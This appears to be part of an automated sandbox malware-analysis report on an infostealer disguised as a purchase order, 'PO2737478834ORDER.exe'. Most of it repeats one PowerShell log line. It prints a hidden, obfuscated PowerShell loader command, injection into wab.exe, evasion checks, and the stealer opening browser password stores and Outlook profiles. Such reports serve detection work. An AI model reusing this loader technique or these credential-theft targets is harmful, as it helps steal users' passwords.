          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: wab.exe, 0000000D.00000003.1784590605.0000000004F39000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0.RUDP\ICACLS.EXE\XCOPY.EXE "" /GRANT:R *S-1-1-0:(OI)(CI)F /T\APPDATA\LOCAL\GOOGLE\APPDATA\LOCAL\GOOGLE\XCOPY.EXE /Y /E /C \APPDATA\ROAMING\MOZILLA\APPDATA\ROAMING\MOZILLA\\APPDATA\ROAMING\MICROSOFT\APPDATA\ROAMING\MICROSOFT\\APPDATA\LOCAL\PACKAGES\MICROSOFT.MICROSOFTEDGE_8WEKYB3D8BBWE\APPDATA\LOCAL\PACKAGES\MICROSOFT.MICROSOFTEDGE_8WEKYB3D8BBWE\TERMSERVICE%PROGRAMFILES%%WINDIR%\SYSTEM32%PROGRAMW6432%\MICROSOFT DN1\RFXVMT.DLL\RDPWRAP.INI\SQLMAP.DLLRPDPSOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\SPECIALACCOUNTS\USERLISTSEDEBUGPRIVILEGESYSTEM\CURRENTCONTROLSET\SERVICES\TERMSERVICE\PARAMETERSSERVICEDLLSYSTEM\CURRENTCONTROLSET\SERVICES\TERMSERVICEIMAGEPATHSVCHOST.EXESVCHOST.EXE -KCERTPROPSVCSESSIONENVSERVICESACTIVESYSTEM\CURRENTCONTROLSET\CONTROL\TERMINAL SERVERSYSTEM\CURRENTCONTROLSET\CONTROL\TERMINAL SERVER\LICENSING CORESOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGONSYSTEM\CURRENTCONTROLSET\CONTROL\TERMINAL SERVER\ADDINSSYSTEM\CURRENTCONTROLSET\CONTROLTERMINAL SERVER\ADDINS\CLIP REDIRECTORSYSTEM\CURRENTCONTROLSET\CONTROL\TERMINAL SERVER\ADDINS\DYNAMIC VCFDENYTSCONNECTIONSENABLECONCURRENTSESSIONSALLOWMULTIPLETSSESSIONSRDPCLIPNAMETYPEMULTIRDP[EXPERIMENTAL] PATCH TERMINAL SERVER SERVICE TO ALLOW MULTIPLES USERSTERMSRV.DLLEXPLORER.EXETASKMGR.EXEPROCESSHACKER.EXEREGEDIT.EXENTDLL.DLLLDRGETPROCEDUREADDRESSRTLNTSTATUSTODOSERRORRTLSETLASTWIN32ERRORNTALLOCATEVIRTUALMEMORYNTPROTECTVIRTUALMEMORYNTWRITEVIRTUALMEMORYLDRLOADDLLRTLCREATEUSERTHREAD
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7323Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2342Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nss3.dllJump to dropped file
          Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\softokn3.dllJump to dropped file
          Source: C:\Users\user\Desktop\PO2737478834ORDER.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsxE304.tmp\nsExec.dllJump to dropped file
          Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\freebl3.dllJump to dropped file
          Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\msvcp140.dllJump to dropped file
          Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mozglue.dllJump to dropped file
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7984Thread sleep time: -5534023222112862s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 656Thread sleep count: 70 > 30Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_3_214797E0 GetSystemTime followed by cmp: cmp edx, 04h and CTI: jc 2147983Bh13_3_214797E0
          Source: C:\Users\user\Desktop\PO2737478834ORDER.exeCode function: 0_2_00406435 FindFirstFileA,FindClose,0_2_00406435
          Source: C:\Users\user\Desktop\PO2737478834ORDER.exeCode function: 0_2_00405889 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405889
          Source: C:\Users\user\Desktop\PO2737478834ORDER.exeCode function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_3_21479970 GetSystemInfo,13_3_21479970
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: wab.exe, 0000000D.00000002.2474135498.0000000004F2F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2474135498.0000000004EFF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: PO2737478834ORDER.exe, 00000000.00000002.1268369142.0000000000668000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: i08hSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\PO2737478834ORDER.exeAPI call chain: ExitProcess graph end nodegraph_0-3663
          Source: C:\Users\user\Desktop\PO2737478834ORDER.exeAPI call chain: ExitProcess graph end nodegraph_0-3840
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_3_214CD060 LdrInitializeThunk,13_3_214CD060
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_3_214D723B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_3_214D723B
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_3_214D981B LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,13_3_214D981B
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_3_214D723B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_3_214D723B
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_3_214D5FCC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_3_214D5FCC

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3960000Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 26FFA7CJump to behavior
          Source: C:\Users\user\Desktop\PO2737478834ORDER.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Akteret=Get-Content 'C:\Users\user\AppData\Roaming\Grydeskeen146\sdfdsf\Kejsertankens\Habitters.Hej';$Engraphy=$Akteret.SubString(54172,3);.$Engraphy($Akteret)"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
          Source: C:\Users\user\Desktop\PO2737478834ORDER.exeCode function: 0_2_700D1096 GetModuleFileNameA,GlobalAlloc,CharPrevA,GlobalFree,GetTempFileNameA,CopyFileA,CreateFileA,CreateFileMappingA,MapViewOfFile,UnmapViewOfFile,CloseHandle,CloseHandle,lstrcatA,lstrlenA,GlobalAlloc,FindWindowExA,FindWindowExA,FindWindowExA,lstrcmpiA,lstrcmpiA,lstrcmpiA,DeleteFileA,GetVersion,GlobalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreatePipe,CreatePipe,CreatePipe,GetStartupInfoA,RpcServerRegisterIf3,CreateProcessA,lstrcpyA,lstrcpyA,wsprintfA,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DeleteFileA,GlobalFree,GlobalFree,GlobalFree,GetTickCount,WaitForSingleObject,GetExitCodeProcess,RpcServerRegisterIf3,PeekNamedPipe,GetTickCount,ReadFile,lstrcpyA,GlobalReAlloc,lstrcpyA,GetTickCount,TerminateProcess,lstrcpyA,Sleep,0_2_700D1096
          Source: wab.exe, 0000000D.00000002.2474135498.0000000004F48000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2474135498.0000000004F2F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
          Source: wab.exe, 0000000D.00000002.2474135498.0000000004F2F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerl
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_3_214D901F GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,13_3_214D901F
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_3_214D73C6 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,13_3_214D73C6
          Source: C:\Users\user\Desktop\PO2737478834ORDER.exeCode function: 0_2_00403312 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403312
          Source: C:\Program Files (x86)\Windows Mail\wab.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Lowering of HIPS / PFW / Operating System Security Settings

          barindex
          Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings MaxConnectionsPerServer 10Jump to behavior

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 0000000D.00000003.1784590605.0000000004F39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000003.1847836407.0000000021C0C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\key4.dbJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\logins.jsonJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\pkcs11.txtJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dtbqpus9.default\logins.jsonJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cert9.dbJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: Yara matchFile source: 0000000D.00000003.1784590605.0000000004F39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: wab.exe PID: 6536, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 0000000D.00000003.1784590605.0000000004F39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000003.1847836407.0000000021C0C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_3_21493030 sqlite3_clear_bindings,_memset,13_3_21493030
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_3_214950E0 sqlite3_bind_parameter_index,13_3_214950E0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_3_214952D0 sqlite3_transfer_bindings,13_3_214952D0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_3_21494BC0 sqlite3_bind_double,13_3_21494BC0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_3_21494B90 sqlite3_bind_blob,13_3_21494B90
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_3_21494D50 sqlite3_bind_value,13_3_21494D50
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_3_21494D20 sqlite3_bind_text16,13_3_21494D20
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_3_21494C40 sqlite3_bind_int64,13_3_21494C40
